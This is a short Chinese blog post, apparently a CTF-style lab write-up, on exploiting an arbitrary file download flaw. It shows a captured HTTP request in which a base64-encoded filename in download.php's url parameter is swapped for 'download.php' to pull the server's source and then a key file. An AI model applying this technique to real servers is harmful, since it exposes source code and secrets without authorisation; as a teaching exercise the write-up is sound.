文件下载漏洞练习(一)

发布时间:2020-08-03 07:43:47 作者:Alyoyojie
来源:网络 阅读:1828

(1)打开网页
文件下载漏洞练习(一)
(2)同样的先抓下包
文件下载漏洞练习(一)

我们注意到:
url=Y2hvdWJhZ3VhaS5tcDM 还有/download.php

先解码看看是什么
文件下载漏洞练习(一)
是个文件名
文件下载漏洞练习(一)
(3)我们试着将其替换成、download.php
文件下载漏洞练习(一)

GET /download.php?url=ZG93bmxvYWQucGhw= HTTP/1.1
Host: e2ad76b4d4b6d6ed.yunyansec.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://e2ad76b4d4b6d6ed.yunyansec.com/
Accept-Language: zh-CN,zh;q=0.9
Connection: close

(4)文件下载成功,打开后发现还可以有hereiskey.php下载

文件下载漏洞练习(一)

同样先编码
文件下载漏洞练习(一)
得到key
文件下载漏洞练习(一)

推荐阅读:
  1. 文件下载漏洞
  2. group by 练习

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

文件下载 (一)

上一篇:Lucene学习笔记之-核心数据结构PriorityQueue的实现原理

下一篇:再说Java异常

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》